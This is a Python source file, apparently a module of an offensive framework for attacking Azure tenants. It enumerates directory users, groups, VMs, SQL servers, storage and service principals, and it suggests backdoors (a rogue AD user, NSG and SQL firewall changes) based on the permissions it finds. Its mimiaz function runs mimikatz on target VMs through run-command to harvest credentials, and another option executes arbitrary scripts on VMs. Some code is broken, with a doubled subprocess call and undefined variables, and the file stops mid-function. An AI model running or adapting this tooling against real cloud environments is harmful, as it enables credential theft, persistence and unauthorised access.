class az(connection):
def __init__(self, args, db, host):
self.db = db
self.args = args
self.az_cli = None
self.username = ''
self.domain = ''
self.username_full = ''
self.windows = False
self.decoder = 'utf-8'
if args.config:
self.config1()
else:
self.proto_flow()
@staticmethod
def proto_args(parser, std_parser, module_parser):
azure_parser = parser.add_parser('az', help="owning over azure", parents=[std_parser, module_parser])
azure_parser.add_argument('--full', action='store_true', help='Display full json output for azure commands')
azure_parser.add_argument('--save', action='store_true', help='Saves just usernames to a file in current directory when doing user enum')
configgroup = azure_parser.add_argument_group("Configure Azure CLI", "Configure the Azure Connection")
configgroup.add_argument('--config', action='store_true', help='Setup or re-bind azure connection')
#commandgroup = azure_parser.add_argument_group("Command Execution", "Options for executing commands")
#commandgroup.add_argument("-x", metavar="COMMAND", dest='execute', help="execute the specified command")
enumgroup = azure_parser.add_argument_group("Enumeration", "Azure AD Enumeration Commands")
enumgroup.add_argument('--user', nargs='?', const='', metavar='USER', help='Enumerate and return all info about a user')
enumgroup.add_argument('--users', action='store_true', help='Enumerate and return all users')
enumgroup.add_argument('--group', nargs='?', const='', metavar='GROUP', help='Enumerate and return all members of a group')
enumgroup.add_argument('--groups', action='store_true', help='Enumerate and return all groups')
enumgroup.add_argument('--usergroups', nargs='?', const='', metavar='USERSGROUPS', help='Enumerate and return all groups a user is a member of')
enumgroup.add_argument('--whoami', action='store_true', help='Show information about current identity')
privgroup = azure_parser.add_argument_group("Privilege Checks", "Get Privs and identify PrivEsc")
privgroup.add_argument('--suggest', action='store_true', help='Check for potentially abusable permissions')
privgroup.add_argument('--privs', nargs='?', const='', metavar='USER', help='Check current users privileges')
resourcegroup = azure_parser.add_argument_group("Resource Checks", "Interact with resources")
resourcegroup.add_argument('--rgroups', action='store_true', help='List all Resource Groups for current subscription')
sqlgroup = azure_parser.add_argument_group("SQL Commands", "Interact with SQL Servers and DBs")
sqlgroup.add_argument('--sql-list', action='store_true', help='List all SQL Servers for current subscription')
sqlgroup.add_argument('--sql-db-list', nargs='?', const='', metavar='USER', help='List all SQL DBs for current subscription')
storagegroup = azure_parser.add_argument_group("Storage Commands", "Interact with Storage")
storagegroup.add_argument('--storage-list', action='store_true', help='List all Storage for current subscription')
vmgroup = azure_parser.add_argument_group("VM Checks", "Interact with VMs and VM Scale Sets")
vmgroup.add_argument('--vm-list', nargs='?', const='', metavar='TARGET_VM', help='List all VMs for current subscription or target resource group')
vmgroup.add_argument('--vmss-list', nargs='?', const='', metavar='TARGET_VMSS', help='List all VM Scale Sets for current subscription or target resource group')
scriptgroup = azure_parser.add_argument_group("Script Execution", "Execute Scripts on Azure VMs")
scriptgroup.add_argument('--mimiaz', action='store_true', help='Execute mimikats on a target VM')
scriptgroup.add_argument('--script', nargs=1, metavar='Full_PATH_TO_SCRIPT', help='Execute Script on a target VM. Use full path to script')
scriptgroup.add_argument('--vm', nargs=1, metavar='TARGET_VM', help='Used to specify target for Script Execution')
scriptgroup.add_argument('--rg', nargs=1, metavar='RESOURCEGROUP',help='Used to specify target resource group for Script Execution')
spngroup = azure_parser.add_argument_group("SPN Checks", "Interact with Service Principals")
spngroup.add_argument('--spn-list', action='store_true', help='List all SPNs for current subscription')
spngroup.add_argument('--spn-owner-list', action='store_true', help='List all SPNs for current subscription')
spngroup.add_argument('--spn-mine', action='store_true', help='List all SPNs owned by current user')
spngroup.add_argument('--spn', nargs='?', const='', metavar='OBJECTID', help='List all SPNs for current subscription')
appgroup = azure_parser.add_argument_group("App Checks", "Interact with Apps")
appgroup.add_argument('--app-list', action='store_true', help='List all Apps for current subscription')
return parser
def proto_flow(self):
self.proto_logger()
if self.test_connection():
self.call_cmd_args()
def proto_logger(self):
if os.name == 'nt':
self.windows = True
self.decoder = 'cp1252'
self.logger = CMXLogAdapter(extra={'protocol': 'AZURE',
'host': self.username,
'port': self.domain,
'hostname': 'CLI'})
def test_connection(self):
if os.name == 'nt':
self.windows = True
self.decoder = 'cp1252'
if not cfg.AZ_CONFIG_PATH.is_file():
self.logger.error('Azure connection has not been configured.')
self.logger.error('Run: cmx az 1 --config')
return False
# Grab our user/domain and re-init logger.
# Config should have stored this in the config file.
f = open(cfg.AZ_CONFIG_PATH,"r")
data = f.read()
f.close()
self.username = data.split()[0].split('@')[0]
self.domain = data.split()[0].split('@')[1]
self.username_full = data.split()[0]
self.proto_logger()
self.az_cli = get_default_cli()
return True
def config1(self):
self.proto_logger()
login = subprocess.run(['az','login', '--allow-no-subscriptions'], shell = self.windows, stdout=subprocess.PIPE)
user = re.findall('([a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+)', str(login.stdout))
self.logger.success('Logged in as {}'.format(user[0])) #maybe not working
print(" ")
subs_resp = subprocess.run(['az','account', 'list', '--query', '[].{SubscriptionName:name, Id:id, TenantId:tenantId}'], shell = self.windows, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
roles_resp = subprocess.run(['az','role', 'assignment', 'list', '--all', '--query', "[?principalName=='$User'].{Role:roleDefinitionName,ResoureGroup:resourceGroup}" ], shell = self.windows, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
#Show subs
try:
subs_resp_json = json.loads(subs_resp.stdout.decode(self.decoder))
#print("subs: {}".format(subs_resp_json))
print("Current user has the following subscriptions:")
print("{:<14}{:<22} {}".format('','TenantId','SubscriptionName'))
for sub in subs_resp_json:
print("{:<36} | {}".format(sub['TenantId'],sub['SubscriptionName']))
except:
#self.logger.error("Current user has no subscriptions")
pass
# Show roles
print("")
try:
roles_resp_json = json.loads(roles_resp.stdout.decode(self.decoder))
print("And the following roles: {}".format(roles_resp_json))
except:
self.logger.error("Current user has no roles")
pass
if not cfg.AZ_PATH.is_dir():
cfg.AZ_PATH.mkdir(parents=True, exist_ok=True)
f = open(cfg.AZ_CONFIG_PATH,"w")
f.write("{}".format(user[0]))
f.close()
print('')
print(" Azure Services now configured, Go get em tiger")
print('')
def call_cmd_args(self):
for k, v in list(vars(self.args).items()):
if hasattr(self, k) and hasattr(getattr(self, k), '__call__'):
if v is not False and v is not None:
logging.debug('Calling {}()'.format(k))
getattr(self, k)()
def execute(self, command):
try:
result = self.az_cli.invoke(command)
return {
'result': result.result,
'error': None
}
except CLIError as err:
return {
'result': None,
'error': err.args
}
###############################################################################
# ###### ####### # # # # # #
# # # # # ## # # # ## ##
# # # # # # # # # # # # # #
# # # # ##### ##### # # # # # # # #
####### # # # # # # # # # #
# # # # # # ## # # # #
# # ###### ####### # # ##### # #
###############################################################################
###############################################################################
# Network/Domain Enum functions
#
# This section:
#
#
#
#
# (fold next line)
###############################################################################
def whoami(self):
my_user_id = subprocess.run(['az','ad', 'signed-in-user', 'show'], shell = self.windows, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
try:
#my_user_id_json = json.loads(my_user_id.stdout.decode('utf-8'))
my_user_id_json = json.loads(my_user_id.stdout.decode(self.decoder))
except:
self.logger.error("Have you setup a session? cmx az --config")
return
self.logger.announce("Getting User Info")
if self.args.full:
pprint.pprint(my_user_id_json)
else:
self.logger.highlight("{:>26} {}".format('userPrincipalName: ', my_user_id_json['userPrincipalName']))
self.logger.highlight("{:>26} {}".format('mail: ', my_user_id_json['mail']))
self.logger.highlight("{:>26} {}".format('mailNickname: ', my_user_id_json['mailNickname']))
self.logger.highlight("{:>26} {}".format('TelephoneNumber: ', my_user_id_json['telephoneNumber']))
self.logger.highlight("{:>26} {}".format('objectId: ', my_user_id_json['objectId']))
self.logger.highlight("{:>26} {}".format('SID: ', my_user_id_json['onPremisesSecurityIdentifier']))
self.logger.highlight("{:>26} {}".format('isCompromised: ', my_user_id_json['isCompromised']))
def user(self):
if self.args.user == '':
self.logger.announce("No user specified, calling whoami")
self.whoami()
return
user_id = subprocess.run(['az','ad', 'user', 'show', '--id', self.args.user], shell = self.windows, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
try:
user_id_json = json.loads(user_id.stdout.decode(self.decoder))
except:
self.logger.error("Current user has no subscriptions")
return
self.db.add_user(user_id_json)
plans = []
for plan in user_id_json["assignedPlans"]:
plans.append(plan["service"])
self.logger.announce("Getting User Info")
if self.args.full:
pprint.pprint(user_id_json)
else:
self.logger.highlight("{:<26} {}".format('userPrincipalName: ', user_id_json['userPrincipalName']))
self.logger.highlight("{:<26} {}".format('mail: ', user_id_json['mail']))
self.logger.highlight("{:<26} {}".format('mailNickname: ', user_id_json['mailNickname']))
self.logger.highlight("{:<26} {}".format('TelephoneNumber: ', user_id_json['telephoneNumber']))
self.logger.highlight("{:<26} {}".format('objectId: ', user_id_json['objectId']))
self.logger.highlight("Plan Memberships: {}".format(plans))
self.logger.highlight("{:<26} {}".format('SID: ', user_id_json['onPremisesSecurityIdentifier']))
self.logger.highlight("{:<26} {}".format('isCompromised: ', user_id_json['isCompromised']))
def usergroups(self):
users_groups = subprocess.run(['az','ad', 'user', 'get-member-groups', '--id', self.args.usergroups], shell = self.windows, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
try:
users_groups_json = json.loads(users_groups.stdout.decode(self.decoder))
except:
self.logger.error("Current user has no subscriptions")
return
pprint.pprint(users_groups_json)
def users(self):
self.logger.announce("Getting all users info, this might take a minute")
user_id = subprocess.run(['az','ad', 'user', 'list'], shell = self.windows, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
try:
user_id_json = json.loads(user_id.stdout.decode(self.decoder))
except:
self.logger.error("Current user has no subscriptions")
return
try:
for user1 in user_id_json:
self.db.add_user(user1)
except:
self.logger.error("add user error tracebak:")
self.logger.error(format_exc())
# Do we save usernames
if self.args.save:
filename = "{}-users.txt".format(self.domain)
savefile = open(filename,"w")
if self.args.full:
pprint.pprint(user_id_json)
else:
usercount = 0
for user1 in user_id_json:
if user1['isCompromised'] == None:
comp = 'No'
else:
comp = 'Yes'
if self.args.save:
savefile.write("{}\n".format(user1['mail']))
usercount = usercount + 1
self.logger.highlight("{:<36} id:{} compromised:{} ".format(user1['userPrincipalName'], user1['objectId'], comp))
if self.args.save:
savefile.close()
self.logger.success("Email addresses saved to: {}".format(filename))
self.logger.success("Total Users Found: {}".format(usercount))
self.logger.success("All user info complete. Check the db for more details")
def group(self):
if self.args.group == '':
self.logger.error('Must provide a group name or objectID')
return
group_list = subprocess.runsubprocess.run(['az','ad', 'group', 'member', 'list', '--group', self.args.group ], shell = self.windows, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
try:
group_list_json = json.loads(group_list.stdout.decode(self.decoder))
except:
self.logger.error("Current user has no subscriptions")
return
pprint.pprint(group_list_json)
def groups(self):
group_list = subprocess.runsubprocess.run(['az','ad', 'group', 'list', '--query', '[].{display_name:displayName, description: description, object_id: objectId}'], shell = self.windows, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
try:
group_list_json = json.loads(group_list.stdout.decode(self.decoder))
except:
self.logger.error("Current user has no subscriptions")
return
pprint.pprint(group_list_json)
###############################################################################
###### ###### ### # # ####### ##### #####
# # # # # # # # # # # #
# # # # # # # # # #
###### ###### # # # ##### ##### #
# # # # # # # # #
# # # # # # # # # # #
# # # ### # ####### ##### #####
###############################################################################
###############################################################################
#
#
#
#
###############################################################################
def suggest(self):
# Grab user UPN
self.logger.announce("Function is a work-in-progress, try running --privs to see current privileges")
upn_resp = subprocess.run(['az', 'ad', 'signed-in-user', 'show','--query', '{upn:userPrincipalName}'], shell = self.windows, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
upn_json_obj = json.loads(upn_resp.stdout.decode(self.decoder))
upn = upn_json_obj['upn']
logging.debug('upn: {}'.format(upn))
# GetCurrent users roles
role_resp = subprocess.run(['az', 'role', 'assignment', 'list', '--assignee', upn, '--query', '[].{roleDefinitionName:roleDefinitionName}'], shell = self.windows, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
try:
role_json_obj = json.loads(role_resp.stdout.decode(self.decoder))
except:
self.logger.error("Current user has no subscriptions")
return
role_list = []
for role in role_json_obj:
role_list.append(role["roleDefinitionName"])
if(len(role_list) == 0):
self.logger.error("No roles found")
return
self.logger.success("Found roles for current user!")
# Get definitions for each role
tmp_list_perms = []
for role in role_list:
role_show = subprocess.run(['az', 'role', 'definition', 'list', '--name', role], shell = self.windows, stdout=subprocess.PIPE)
role_show_json = json.loads(role_show.stdout.decode(self.decoder))
tmp_list_perms.append(role_show_json[0]['permissions'][0]['actions'][0])
all_permissions = [item for sublist in tmp_list_perms for item in sublist]
self.check_perms(all_permissions)
def check_perms(self, permissions):
self.logger.announce("Getting potentially abusable global permissions")
for perm in permissions:
if("*" in perm):
self.logger.highlight("Found permission with * - should investigate: {}".format(perm))
elif("write" in perm):
self.logger.highlight(" found permission with write - should investigate: {}".format(perm))
elif("create" in perm):
self.logger.highlight(" found permission with create - should investigate: {}".format(perm))
elif("delete" in perm):
self.logger.highlight(" found permission with delete - should investigate: {}".format(perm))
self.logger.announce("Checking for specific permissions")
for perm in permissions:
if("Microsoft.Authorization/*" in perm):
self.logger.highlight("Current user has permission to do all authorizations actions to resources - consider RBAC manipulation and adding a backdoor AD user")
if("Microsoft.Authorization/*/read" in perm):
self.logger.highlight("Current user has permission to read all authorizations - consider running the priv domain enum module")
if("Microsoft.Compute/*" in perm):
self.logger.highlight("Current user has permission to run all operations for all resource types - consider using the exfil modules")
if("Microsoft.Compute/*/read" in perm):
self.logger.highlight("Current user has permission to read all compute related resources - consider using the various 'list' modules")
if("Microsoft.Support/*" in perm):
self.logger.highlight("Current user has permission to issue and submit support tickets")
if("Microsoft.Resources/*" in perm):
self.logger.highlight("Current user has permission to run all Microsoft.Resources related commands")
elif("Microsoft.Resources/deployments/*" in perm):
self.logger.highlight("Current user has permission to run all deployment related commands")
elif("Microsoft.Resources/deployments/subscriptions/*" in perm):
self.logger.highlight("Current user has permission to run all subscription related commands")
if("Microsoft.Network/*" in perm):
self.logger.highlight("Current user has permission to run all networking related commands - consider running the net modules")
elif("Microsoft.Network/networkSecurityGroups/*" in perm):
self.logger.highlight("Current user has permission to run all nsg related commands - consider running the nsg backdoor module")
elif("Microsoft.Network/networkSecurityGroups/join/action" in perm):
self.logger.highlight("Current user has permission to join a network security group ")
if("Microsoft.Compute/virtualMachines/*" in perm):
self.logger.highlight("Current user has permission to run virtual machine commands - consider running the various vm modules ")
elif("Microsoft.Compute/virtualMachines/runCommand/action" in perm or "Microsoft.Compute/virtualMachines/runCommand/*" in perm):
self.logger.highlight("Current user has permission to run the runCommand virtual machine command - consider running the vm_rce ")
if("Microsoft.Compute/virtualMachinesScaleSets/*" in perm):
self.logger.highlight("Current user has permission to run virtual machine scale set commands - consider running the various vmss modules ")
elif("Microsoft.Compute/virtualMachinesScaleSets/runCommand/action" in perm or "Microsoft.Compute/virtualMachines/runCommand/*" in perm):
self.logger.highlight("Current user has permission to run the runCommand virtual machine scale set command - consider running the vmss_rce ")
if("Microsoft.Storage/*" in perm or "Microsoft.Storage/storageAccounts/*" in perm):
self.logger.highlight("Current user has permission to run all storage account commands - consider running the various stg modules ")
elif("Microsoft.Storage/storageAccounts/blobServices/containers/*" in perm):
self.logger.highlight("Current user has permissions to run all storage account container commands - consider running the various stg modules ")
elif("Microsoft.Storage/storageAccounts/listKeys/action" in perm):
self.logger.highlight("Current user has permission to read storage account keys - consider running the stg blob scan/download modules ")
if("Microsoft.Sql/*" in perm):
self.logger.highlight("Current user has permission to run all sql commands - consider running the various sql modules ")
elif("Microsoft.Sql/servers/*" in perm):
self.logger.highlight("Current user has permission to run all sql server commands - consider running the sql server list or the sql backdoor firewall modules ")
elif("Microsoft.Sql/servers/databases/*" in perm):
self.logger.highlight("Current user has permission to run all sql database commands - consider running the sql db list ")
def privs(self):
# Grab user UPN
#az ad signed-in-user show
#az ad user show --id XXXX
logging.debug("Starting privs")
if self.args.privs == '':
upn_resp = subprocess.run(['az', 'ad', 'signed-in-user', 'show','--query', '{upn:userPrincipalName}'], shell = self.windows, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
else:
upn_resp = subprocess.run(['az','ad', 'user', 'show', '--id', self.args.privs, '--query', '{upn:userPrincipalName}'], shell = self.windows, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
try:
upn_json_obj = json.loads(upn_resp.stdout.decode(self.decoder))
upn = upn_json_obj['upn']
logging.debug("upn {}".format(upn))
except:
self.logger.error("Current user has no subscriptions")
return
# Get target user's roles
# az role assignment list --assignee XXX
role_resp = subprocess.run(['az', 'role', 'assignment', 'list', '--assignee', upn], shell = self.windows, stdout=subprocess.PIPE)
try:
role_json_obj = json.loads(role_resp.stdout.decode(self.decoder))
except:
self.logger.error("Current user has no subscriptions")
return
role_list = []
for role in role_json_obj:
logging.debug("role found: {}".format(role["roleDefinitionName"]))
role_list.append(role["roleDefinitionName"])
if(len(role_list) == 0):
self.logger.error("No roles found")
return
self.logger.success("Roles Found!")
if self.args.full:
pprint.pprint(role_json_obj)
return
self.logger.highlight("{:<20} | {}".format(' Role', ' Scope'))
for role in role_json_obj:
self.logger.highlight("{:<20} | {}".format(role['roleDefinitionName'], role['scope']))
# What do roles mean?
self.logger.success("Info about Roles")
self.logger.highlight("{:<20} | {}".format(' Role', ' Description'))
for role in role_list:
#print(role.upper())
#role_show = subprocess.run(['az', 'role', 'definition', 'list', '--name', role, '--query', '[].{actions:permissions[].actions[], dataActions:permissions[].dataActions[], notActions:permissions[].notActions[], notDataActions:permissions[].notDataActions[]}'], shell = self.windows, stdout=subprocess.PIPE)
role_show = subprocess.run(['az', 'role', 'definition', 'list', '--name', role], shell = self.windows, stdout=subprocess.PIPE)
role_show_json = json.loads(role_show.stdout.decode(self.decoder))
for role in role_show_json:
self.logger.highlight("{:<20} | {} ".format(role['roleName'],
(role['description'][:58] + (role['description'][58:] and '..')) ))
###############################################################################
###### ####### ##### ####### # # ###### ##### #######
# # # # # # # # # # # # # #
# # # # # # # # # # # #
###### ##### ##### # # # # ###### # #####
# # # # # # # # # # # #
# # # # # # # # # # # # # #
# # ####### ##### ####### ##### # # ##### #######
###############################################################################
###############################################################################
#
#
#
#
###############################################################################
def rgroups(self):
# az group list --query
rgroup = subprocess.run(['az','group', 'list', '--query', '[].{name:name, location: location, id: id}'], shell = self.windows, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
try:
rgroup_json = json.loads(rgroup.stdout.decode(self.decoder))
except:
self.logger.error("Current user has no subscriptions")
return
pprint.pprint(rgroup_json)
###############################################################################
##### ##### #
# # # # #
# # # #
##### # # #
# # # # #
# # # # #
##### #### # #######
###############################################################################
###############################################################################
#
#
#
#
###############################################################################
def sql_list(self):
# Get server list
# az sql server list
sql_info = subprocess.run(['az', 'sql', 'server', 'list', '--query', '[].{fqdn:fullyQualifiedDomainName, name:name, rgrp: resourceGroup, admin_username:administratorLogin} '], shell = self.windows, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
try:
sql_info_json = json.loads(sql_info.stdout.decode(self.decoder))
except:
self.logger.error("Current user has no SQL subscriptions")
return
pprint.pprint(sql_info_json)
def sql_db_list(self):
# Get server list
# az sql server list
sql_info = subprocess.run(['az', 'sql', 'server', 'list', '--query', '[].{name:name, rgrp: resourceGroup} '], shell = self.windows, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
try:
sql_info_json = json.loads(sql_info.stdout.decode(self.decoder))
except:
self.logger.error("Current user has no SQL subscriptions")
return
servers = []
rgrps = []
for info in sql_info_json:
servers.append(info['name'])
rgrps.append(info['rgrp'])
pprint.pprint(rgroup_json)
# Get DBs
# az sql db list --server XXX --resource-group XXX
for i in range(len(servers)):
sql_info = subprocess.run(['az', 'sql', 'db', 'list', '--server', servers[i], '--resource-group', rgrps[i], '--query', '[].{collation:collation, name:name, location:location, dbId:databaseId}'], shell = self.windows, stdout=subprocess.PIPE)
sql_info_json = json.loads(sql_info.stdout.decode(self.decoder))
print(servers[i], "\n")
pprint.pprint(sql_info_json)
###############################################################################
##### ####### ####### ###### # ##### #######
# # # # # # # # # # # #
# # # # # # # # # #
##### # # # ###### # # # #### #####
# # # # # # ####### # # #
# # # # # # # # # # # #
##### # ####### # # # # ##### #######
###############################################################################
###############################################################################
#
#
#
#
###############################################################################
def storage_list(self):
# az storage account list
stg_list = subprocess.run(['az','storage', 'account', 'list', '--query', '[].{resource_group:resourceGroup, storage_types:primaryEndpoints}'], shell = self.windows, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
try:
stg_list_json = json.loads(stg_list.stdout.decode(self.decoder))
except:
self.logger.error("Current user has no Storage subscriptions")
return
pprint.pprint(stg_list_json)
###############################################################################
# # # #
# # ## ##
# # # # # #
# # # # #
# # # #
# # # #
# # #
###############################################################################
###############################################################################
#
#
#
#
###############################################################################
def vm_list(self):
# Get all vms in subscription
# az vm list
if self.args.vm_list == '':
vm_list = subprocess.run(['az','vm', 'list', '--query', '[].{name:name,os:storageProfile.osDisk.osType, username:osProfile.adminUsername, vm_size:hardwareProfile.vmSize, resource_group: resourceGroup}'], shell = self.windows, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
try:
vm_list_json = json.loads(vm_list.stdout.decode(self.decoder))
except:
self.logger.error("Current user has no VM subscriptions")
return
# az vm list-ip-addresses
vm_iplist = subprocess.run(['az','vm', 'list-ip-addresses', '--query', '[].{name:virtualMachine.name, privateIp:virtualMachine.network.privateIpAddresses, publicIp:virtualMachine.network.publicIpAddresses[].ipAddress}'], shell = self.windows, stdout=subprocess.PIPE)
try:
vm_iplist_json = json.loads(vm_iplist.stdout.decode(self.decoder))
except:
self.logger.error("Current user has no VM subscriptions")
return
else: # Get all vms in specified resource group
# az vm list -g XXX
vm_list = subprocess.run(['az','vm', 'list', '-g', self.args.vm_list, '--query', '[].{name:name,os:storageProfile.osDisk.osType, username:osProfile.adminUsername, vm_size:hardwareProfile.vmSize, resource_group: resourceGroup}'], shell = self.windows, stdout=subprocess.PIPE)
try:
vm_list_json = json.loads(vm_list.stdout.decode(self.decoder))
except:
self.logger.error("Current user has no VM subscriptions")
return
# az vm list-ip-addresses -g XXX
vm_iplist = subprocess.run(['az','vm', 'list-ip-addresses', '-g', self.args.vm_list, '--query', '[].{name:virtualMachine.name, privateIp:virtualMachine.network.privateIpAddresses, publicIp:virtualMachine.network.publicIpAddresses[].ipAddress}'], shell = self.windows, stdout=subprocess.PIPE)
try:
vm_iplist_json = json.loads(vm_iplist.stdout.decode(self.decoder))
except:
self.logger.error("Current user has no VM subscriptions")
return
#combine vm info
for i in range(len(vm_list_json)):
vm_list_json[i].update(vm_iplist_json[i])
if self.args.full:
pprint.pprint(vm_list_json)
return
self.logger.highlight("{:<15} {:<10} {:<19} {:<19} {:<19} ".format('Name', 'os', 'privateIp', 'publicIp', 'ResourceGroup'))
for vm in vm_list_json:
self.logger.highlight("{:<15} | {:<10} | {:<19} | {:<19} | {:<19} ".format(vm['name'],
vm['os'],
vm['privateIp'][0] if vm['privateIp'] else 'Null',
vm['publicIp'][0] if vm['publicIp'] else 'Null',
vm['resource_group'],
))
# to see if its running, check the output from
# az vm get-instance-view --ids /subscriptions/51eae010-e6eb-48e2-8f01-e89b22a86d26/resourceGroups/RESOURCE1/providers/Microsoft.Compute/virtualMachines/test1
#"statuses": [
# {
# "code": "ProvisioningState/succeeded",
# "displayStatus": "Provisioning succeeded",
# "level": "Info",
# "message": null,
# "time": "2019-12-19T22:49:17.337039+00:00"
# },
# {
# "code": "PowerState/deallocated",
# "displayStatus": "VM deallocated",
# "level": "Info",
# "message": null,
# "time": null
# }
# ],
def vmss_list(self):
# Get list of vmss
# az vmss list
vmss_list = subprocess.run(['az','vmss', 'list', '--query', '[].{name:name, rgrp:resourceGroup}'], shell = self.windows, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
try:
vmss_list_json = json.loads(vmss_list.stdout.decode(self.decoder))
except:
self.logger.error("Current user has no VM subscriptions")
return
for i in range(len(vmss_list_json)):
# Get vmss info
vmss_list = subprocess.run(['az','vmss', 'list', '--resource-group', vmss_list_json[i]['rgrp'], '--query', '[].{name:name, vmss_size:sku.name, os_distro:virtualMachineProfile.storageProfile.imageReference.offer,os_version:virtualMachineProfile.storageProfile.imageReference.sku, username:virtualMachineProfile.osProfile.adminUsername, rgrp: resourceGroup}'], shell = self.windows, stdout=subprocess.PIPE)
vmss_list_json = json.loads(vmss_list.stdout.decode(self.decoder))
pprint.pprint(vmss_list_json[i])
# Get vmss IP
vmss_iplist = subprocess.run(['az','vmss', 'list-instance-public-ips', '--resource-group', vmss_list_json[i]['rgrp'], '--name', vmss_list_json[i]['name'], '--query', '[].{ipAddress:ipAddress}'], shell = self.windows, stdout=subprocess.PIPE)
vmss_iplist_json = json.loads(vmss_iplist.stdout.decode(self.decoder))
pprint.pprint(vmss_iplist_json)
###############################################################################
##### ##### ###### ### ###### #######
# # # # # # # # # #
# # # # # # # #
##### # ###### # ###### #
# # # # # # #
# # # # # # # # #
##### ##### # # ### # #
###############################################################################
###############################################################################
#
#
#
#
###############################################################################
def mimiaz(self):
# testing with just running coffee
# need to figure out how we gonna get output back - limited to 4096 this way...
if self.args.mimiaz and (self.args.vm is None or self.args.rg is None):
self.logger.error("mimiaz requires --vm and --rg.")
self.logger.error("Try `cmx az --vm-list` to find values")
return
mimiaz_path = cfg.PS_PATH / 'mimiaz.ps1'
mimiaz_script = '@' + str(mimiaz_path)
self.logger.announce("Running mimikatz on {}, please allow at least 30 seconds".format(self.args.vm[0]))
commander = subprocess.run(['az','vm', 'run-command', 'invoke', '--command-id', 'RunPowerShellScript', '--name', self.args.vm[0], '-g', self.args.rg[0], '--scripts', mimiaz_script], shell = self.windows, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
try:
commander_json = json.loads(commander.stdout.decode(self.decoder))
except:
self.logger.error("Current user has no VM subscriptions")
return
if self.args.full:
pprint.pprint(commander_json)
else:
print(commander_json['value'][0]['message'])
def script(self):
# need to figure out how we gonna get output back - limited to 4096 this way...
if self.args.vm is None or self.args.rg is None:
self.logger.error("script execution requires a --vm and --rg.")
self.logger.error("Try `cmx az --vm-list` to find values")
return
if Path(self.args.script[0]).is_file():
script_path = '@' + self.args.script[0]
else:
self.logger.error("Script not found at {}".format(self.args.script[0]))
return
self.logger.announce("Running script on {}, please allow at least 30 seconds".format(self.args.vm[0]))
commander = subprocess.run(['az','vm', 'run-command', 'invoke', '--command-id', 'RunPowerShellScript', '--name', self.args.vm[0], '-g', self.args.rg[0], '--scripts', script_path], shell = self.windows, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
try:
commander_json = json.loads(commander.stdout.decode(self.decoder))
except:
self.logger.error("Script Execution Failed")
return
if self.args.full:
pprint.pprint(commander_json)
else:
print(commander_json['value'][0]['message'])
###############################################################################
##### ###### # #
# # # # ## #
# # # # # #
##### ###### # # #
# # # # #
# # # # ##
##### # # #
###############################################################################
###############################################################################
#
#
#
#
###############################################################################
def spn_list(self):
# az ad sp list --all
spnn_list = subprocess.run(['az','ad', 'sp', 'list', '--all', '--query', '[].{appDisplayName:appDisplayName, appId:appId, appOwnerTenantId:appOwnerTenantId, publisherName:publisherName}'], shell = self.windows, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
try:
spn_list_json = json.loads(spnn_list.stdout.decode(self.decoder))
except:
self.logger.error("Current user has no VM subscriptions")
return
self.logger.announce("Getting SPN Info")
if self.args.full:
pprint.pprint(spn_list_json)
else:
self.logger.highlight("{:<40} | {:<32} | {:<32} | publisherName".format(' associated-app', ' appId', ' appOwnerTenantId'))
for spn in spn_list_json:
if spn['appDisplayName'] and spn['appId']:
self.logger.highlight("{:<40} | {} | {} | {}".format((spn['appDisplayName'][:37] + (spn['appDisplayName'][37:] and '..')),
spn['appId'],
spn['appOwnerTenantId'],
spn['publisherName']))
def spn_owner_list(self):
# az ad sp list --all
spnn_list = subprocess.run(['az','ad', 'sp', 'list', '--all', '--query', '[].{appDisplayName:appDisplayName, appId:appId, appOwnerTenantId:appOwnerTenantId}'], shell = self.windows, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
try:
spn_list_json = json.loads(spnn_list.stdout.decode(self.decoder))
except:
self.logger.error("Current user has no VM subscriptions")
return
self.logger.announce("Getting SPN Info")
if self.args.full:
pprint.pprint(spn_list_json)
else:
self.logger.highlight("{:<40} | {:<32} | {}".format(' associated-app', ' appId', ' appOwnerTenantId'))
for spn in spn_list_json:
spn_own_list = subprocess.run(['az','ad', 'sp', 'owner', 'list', '--id', spn['appId']], shell = self.windows, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
try:
spn_own_list_json = json.loads(spn_own_list.stdout.decode(self.decoder))
except:
self.logger.error("Error getting owner list")
return
print("app:{}".format(spn['appDisplayName']))
pprint.pprint(spn_own_list_json)
def spn(self):
# az ad sp list --all --query [].{appDisplayName:appDisplayName, appId:appId, appOwnerTenantId:appOwnerTenantId}
spnn_list = subprocess.run(['az','ad', 'sp', 'list', '--all', '--query', '[].{appDisplayName:appDisplayName, appId:appId, appOwnerTenantId:appOwnerTenantId}'], shell = self.windows, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
try:
spn_list_json = json.loads(spnn_list.stdout.decode(self.decoder))
except:
decode_fail = True
pass
# this added try/catch is because windows is F'd
try:
if decode_fail:
spn_list_json = json.loads(spnn_list.stdout.decode('cp1252'))
except:
self.logger.error("Current user has no VM subscriptions")
return
self.logger.announce("Getting SPN Info")
if self.args.full:
pprint.pprint(spn_list_json)
else:
self.logger.highlight("{:<40} | {:<32} | {}".format(' associated-app', ' appId', ' appOwnerTenantId'))
for spn in spn_list_json:
if spn['appDisplayName'] and spn['appId']:
self.logger.highlight("{:<40} | {} | {}".format((spn['appDisplayName'][:37] + (spn['appDisplayName'][37:] and '..')),
spn['appId'],
spn['appOwnerTenantId']))
def spn_mine(self):
